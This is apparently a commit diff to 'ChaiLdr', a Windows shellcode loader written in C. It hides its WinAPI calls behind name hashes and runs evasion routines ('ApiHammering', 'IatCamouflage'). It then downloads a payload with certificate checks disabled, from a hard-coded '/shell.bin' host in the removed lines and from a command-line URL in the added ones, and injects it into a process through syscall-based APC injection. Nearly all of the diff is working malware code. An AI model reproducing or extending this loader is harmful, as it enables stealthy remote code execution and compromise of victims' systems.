Cipher7 · come2darkside · May 17, 2024
diff --git a/ChaiLdr/downloader.c b/ChaiLdr/downloader.c
@@ -5,104 +5,81 @@
 #include "include/common.h"
 
 #define InternetOpenA_JOAA      0x154BE30F
-#define InternetConnectA_JOAA   0x51CC39CF
-#define HttpOpenRequestA_JOAA   0x03084192
-#define InternetSetOptionA_JOAA         0xD8C64F22
-#define HttpSendRequestA_JOAA   0xA14CFDA5
+#define InternetOpenUrlA_JOAA   0x36430125
+#define InternetSetOptionA_JOAA 0xD8C64F22
 #define InternetReadFile_JOAA   0xF1FF9642
-#define InternetCloseHandle_JOAA        0x9E679473
+#define InternetCloseHandle_JOAA 0x9E679473
 #define GetTickCount64_JOAA     0x00BB616E
-#define LoadLibraryA_JOAA	0x54C1D227
+#define LoadLibraryA_JOAA	    0x54C1D227
 #define KERNEL32DLL_JOAA        0xFD2AD9BD
 #define WININETDLL_JOAA         0x668CA1EC
 
 
 API_HASHING g_Api = { 0 };
 
-DWORD Download(char** response, PVOID url, PVOID endpoint, BOOL ssl)
+DWORD Download(char** response, char* url, BOOL ssl)
 {
-	HANDLE kernerl32_handle = GetModuleHandleH(KERNEL32DLL_JOAA);
-	g_Api.pLoadLibraryA = (fnLoadLibraryA)GetProcAddressH(kernerl32_handle, LoadLibraryA_JOAA);
-
-	HANDLE wininet_handle = g_Api.pLoadLibraryA("wininet.dll");
-
-	g_Api.pInternetOpenA = (fnInternetOpenA)GetProcAddressH(wininet_handle, InternetOpenA_JOAA);
-	g_Api.pInternetConnectA = (fnInternetConnectA)GetProcAddressH(wininet_handle, InternetConnectA_JOAA);
-	g_Api.pHttpOpenRequestA = (fnHttpOpenRequestA)GetProcAddressH(wininet_handle, HttpOpenRequestA_JOAA);
-	g_Api.pInternetSetOptionA = (fnInternetSetOptionA)GetProcAddressH(wininet_handle, InternetSetOptionA_JOAA);
-	g_Api.pHttpSendRequestA = (fnHttpSendRequestA)GetProcAddressH(wininet_handle, HttpSendRequestA_JOAA);
-	g_Api.pInternetReadFile = (fnInternetReadFile)GetProcAddressH(wininet_handle, InternetReadFile_JOAA);
-	g_Api.pInternetCloseHandle = (fnInternetCloseHandle)GetProcAddressH(wininet_handle, InternetCloseHandle_JOAA);
-	g_Api.pGetTickCount64 = (fnGetTickCount64)GetProcAddressH(GetModuleHandleH(KERNEL32DLL_JOAA), GetTickCount64_JOAA);
-
-
-	if (g_Api.pGetTickCount64 == NULL) printf("GetTickCount64\n");
-	if (g_Api.pInternetOpenA == NULL) printf("InternetOpenA\n");
-	if (g_Api.pInternetConnectA == NULL) printf("InternetConnectA\n");
-	if (g_Api.pHttpOpenRequestA == NULL) printf("HttpOpenRequestA\n");
-	if (g_Api.pInternetSetOptionA == NULL) printf("InternetSetOptionA\n");
-	if (g_Api.pHttpSendRequestA == NULL) printf("HttpSendRequestA\n");
-	if (g_Api.pInternetReadFile == NULL) printf("InternetReadFile\n");
-	if (g_Api.pInternetCloseHandle == NULL) printf("InternetCloseHandle\n");
-
-
-	DWORD bytesRead = 0;
-	DWORD totalBytesRead = 0;
-	const DWORD bufferSize = 1024;
-	char buffer[1024];
-
-	HINTERNET hInternet = g_Api.pInternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
-
-	if (hInternet == NULL)
-		return -1;
-
-	// connect to remote server
-	HINTERNET hConnect = NULL;
-	if(ssl)
-		hConnect = g_Api.pInternetConnectA(hInternet, url, INTERNET_DEFAULT_HTTPS_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)NULL);
-	else
-		hConnect = g_Api.pInternetConnectA(hInternet, url, INTERNET_DEFAULT_HTTP_PORT, NULL, NULL, INTERNET_SERVICE_HTTP, 0, (DWORD_PTR)NULL);
-
-	if (hConnect == NULL)
-	{
-		g_Api.pInternetCloseHandle(hInternet);
-		return -1;
-	}
-
-	HINTERNET hRequest = NULL;
-	if(ssl)
-		hRequest = g_Api.pHttpOpenRequestA(hConnect, "GET", endpoint , NULL, NULL, NULL, (INTERNET_FLAG_SECURE | INTERNET_FLAG_DONT_CACHE), 0);
-	else
-		hRequest = g_Api.pHttpOpenRequestA(hConnect, "GET", endpoint, NULL, NULL, NULL, (INTERNET_FLAG_DONT_CACHE), 0);
-
-	DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
-
-	g_Api.pInternetSetOptionA(hRequest, INTERNET_OPTION_SECURITY_FLAGS,&flags,sizeof(flags));
-
-	BOOL status = g_Api.pHttpSendRequestA(hRequest,NULL,0,NULL,0);
-
-	DWORD dwBytesRead = NULL;
-	SIZE_T sSize = 0;
-
-	*response = (char*)malloc(1);
-	do {
-		if (g_Api.pInternetReadFile(hRequest, buffer, bufferSize, &bytesRead)) {
-			if (bytesRead > 0) {
-				char* temp = (char*)realloc(*response, totalBytesRead + bytesRead + 1);
-				if (temp == NULL) {
-					return NULL;
-				}
-				else {
-					*response = temp;
-					memcpy(*response + totalBytesRead, buffer, bytesRead);
-					totalBytesRead += bytesRead;
-					(*response)[totalBytesRead] = '\0';
-				}
-			}
-		}
-	} while (bytesRead > 0);
-
-	g_Api.pInternetCloseHandle(hInternet);
-	g_Api.pInternetCloseHandle(hRequest);
-	return totalBytesRead;
-}
+    HANDLE kernerl32_handle = GetModuleHandleH(KERNEL32DLL_JOAA);
+    g_Api.pLoadLibraryA = (fnLoadLibraryA)GetProcAddressH(kernerl32_handle, LoadLibraryA_JOAA);
+
+    HANDLE wininet_handle = g_Api.pLoadLibraryA("wininet.dll");
+
+    g_Api.pInternetOpenA = (fnInternetOpenA)GetProcAddressH(wininet_handle, InternetOpenA_JOAA);
+    g_Api.pInternetOpenUrlA = (fnInternetOpenUrlA)GetProcAddressH(wininet_handle, InternetOpenUrlA_JOAA);
+    g_Api.pInternetSetOptionA = (fnInternetSetOptionA)GetProcAddressH(wininet_handle, InternetSetOptionA_JOAA);
+    g_Api.pInternetReadFile = (fnInternetReadFile)GetProcAddressH(wininet_handle, InternetReadFile_JOAA);
+    g_Api.pInternetCloseHandle = (fnInternetCloseHandle)GetProcAddressH(wininet_handle, InternetCloseHandle_JOAA);
+    g_Api.pGetTickCount64 = (fnGetTickCount64)GetProcAddressH(GetModuleHandleH(KERNEL32DLL_JOAA), GetTickCount64_JOAA);
+
+    if (g_Api.pGetTickCount64 == NULL) printf("GetTickCount64\n");
+    if (g_Api.pInternetOpenA == NULL) printf("InternetOpenA\n");
+    if (g_Api.pInternetOpenUrlA == NULL) printf("InternetOpenUrlA\n");
+
+    if (g_Api.pInternetSetOptionA == NULL) printf("InternetSetOptionA\n");
+    if (g_Api.pInternetReadFile == NULL) printf("InternetReadFile\n");
+    if (g_Api.pInternetCloseHandle == NULL) printf("InternetCloseHandle\n");
+
+    DWORD bytesRead = 0;
+    DWORD totalBytesRead = 0;
+    const DWORD bufferSize = 1024;
+    char buffer[1024];
+
+    HINTERNET hInternet = g_Api.pInternetOpenA("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36", INTERNET_OPEN_TYPE_DIRECT, NULL, NULL, 0);
+
+    if (hInternet == NULL)
+        return -1;
+
+    // Open URL directly
+    HINTERNET hUrl = g_Api.pInternetOpenUrlA(hInternet, url, NULL, 0, INTERNET_FLAG_DONT_CACHE | (ssl ? INTERNET_FLAG_SECURE : 0), 0);
+
+    if (hUrl == NULL)
+    {
+        g_Api.pInternetCloseHandle(hInternet);
+        return -1;
+    }
+
+    DWORD flags = SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_CERT_DATE_INVALID;
+    g_Api.pInternetSetOptionA(hUrl, INTERNET_OPTION_SECURITY_FLAGS, &flags, sizeof(flags));
+
+    *response = (char*)malloc(1);
+    do {
+        if (g_Api.pInternetReadFile(hUrl, buffer, bufferSize, &bytesRead)) {
+            if (bytesRead > 0) {
+                char* temp = (char*)realloc(*response, totalBytesRead + bytesRead + 1);
+                if (temp == NULL) {
+                    return NULL;
+                }
+                else {
+                    *response = temp;
+                    memcpy(*response + totalBytesRead, buffer, bytesRead);
+                    totalBytesRead += bytesRead;
+                    (*response)[totalBytesRead] = '\0';
+                }
+            }
+        }
+    } while (bytesRead > 0);
+
+    g_Api.pInternetCloseHandle(hUrl);
+    g_Api.pInternetCloseHandle(hInternet);
+    return totalBytesRead;
+}
diff --git a/ChaiLdr/include/common.h b/ChaiLdr/include/common.h
@@ -23,6 +23,7 @@ typedef struct _API_HASHING {
 	fnInternetReadFile              pInternetReadFile;
 	fnInternetCloseHandle           pInternetCloseHandle;
 	fnLoadLibraryA					pLoadLibraryA;
+	fnInternetOpenUrlA				pInternetOpenUrlA;
 } API_HASHING, * PAPI_HASHING;
 
 // inject.c
@@ -38,7 +39,7 @@ HMODULE GetModuleHandleH(DWORD dwModuleNameHash);
 BOOL ApiHammering(DWORD Stress);
 
 // downloader.c
-DWORD Download(char** response, PVOID url, PVOID endpoint, BOOL ssl);
+DWORD Download(char** response, char* url, BOOL ssl);
 
 //iatcamo.c
 VOID IatCamouflage();
diff --git a/ChaiLdr/include/typedef.h b/ChaiLdr/include/typedef.h
@@ -19,4 +19,6 @@ typedef BOOL(WINAPI* fnInternetReadFile)(HINTERNET hFile, LPVOID lpBuffer, DWORD
 
 typedef BOOL(WINAPI* fnInternetCloseHandle)(HINTERNET hInternet);
 
-typedef HMODULE(WINAPI* fnLoadLibraryA)(LPCSTR lpLibFileName);
+typedef HMODULE(WINAPI* fnLoadLibraryA)(LPCSTR lpLibFileName);
+
+typedef HINTERNET(WINAPI* fnInternetOpenUrlA)(HINTERNET hInternet, LPCSTR lpszUrl, LPCSTR lpszHeaders, DWORD dwHeadersLength, DWORD dwFlags, DWORD_PTR dwContext);
diff --git a/ChaiLdr/inject.c b/ChaiLdr/inject.c
@@ -13,6 +13,10 @@ BOOL ApcInjectionViaSyscalls(HANDLE hProcess, HANDLE hThread, PVOID pPayload, SI
 	// Allocating memory
 	if ((STATUS = Sw3NtAllocateVirtualMemory(hProcess, &pAddress, 0, &sPayloadSize, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE)) != 0)
 	{
+		printf("[!] hProcess : %d \n", hProcess);
+		printf("[!] pAddress : %p \n", pAddress);
+		printf("[!] sPayloadSize : %d \n", sPayloadSize);
+
 		printf("[!] NtAllocateVirtualMemory Failed With Error : 0x%0.8X \n", STATUS);
 		goto _Cleanup;
 	}

diff --git a/ChaiLdr/main.c b/ChaiLdr/main.c
@@ -1,35 +1,48 @@
 #include <Windows.h>
+#include <stdio.h>
+#include <string.h>
 #include "include/common.h"
 
-int main()
+int main(int argc, char* argv[])
 {
-	ApiHammering(2000);
-
-	IatCamouflage();
-
-	unsigned char* pPayload = NULL;
-
-	PSTR url = "192.168.231.130";
-	PSTR endpoint = "/shell.bin";
-
-	SIZE_T sSize = Download(&pPayload, url, endpoint, FALSE);
-
-	if (sSize == -1)
-		goto _Cleanup;
-	//Printing shellcode
-	/*printf("[*] Shellcode: \n");
-	for (SIZE_T i = 0; i < sSize; i++)
-	{
-		printf("%02X ", pPayload[i]);
-	}
-	printf("\n");*/
-
-	if (InitiateInjection(pPayload,sSize))
-	{
-		return -1;
-	}
+    if (argc != 2) {
+        fprintf(stderr, "Usage: %s <url/endpoint>\n", argv[0]);
+        return -1;
+    }
 
-_Cleanup:
-	return 0;
+    PSTR fullUrl = argv[1];
+
+
+
+    if (fullUrl == NULL) {
+        fprintf(stderr, "Invalid format. Expected format: <url/endpoint>\n");
+        return -1;
+    }
+
+    ApiHammering(2000);
+
+    IatCamouflage();
+
+    unsigned char* pPayload = NULL;
 
+    SIZE_T sSize = Download(&pPayload, fullUrl, FALSE);
+
+    if (sSize == -1)
+        goto _Cleanup;
+
+    // Printing shellcode
+    /*printf("[*] Shellcode: \n");
+    for (SIZE_T i = 0; i < sSize; i++)
+    {
+        printf("%02X ", pPayload[i]);
+    }
+    printf("\n");*/
+
+    if (InitiateInjection(pPayload, sSize))
+    {
+        return -1;
+    }
+
+_Cleanup:
+    return 0;
 }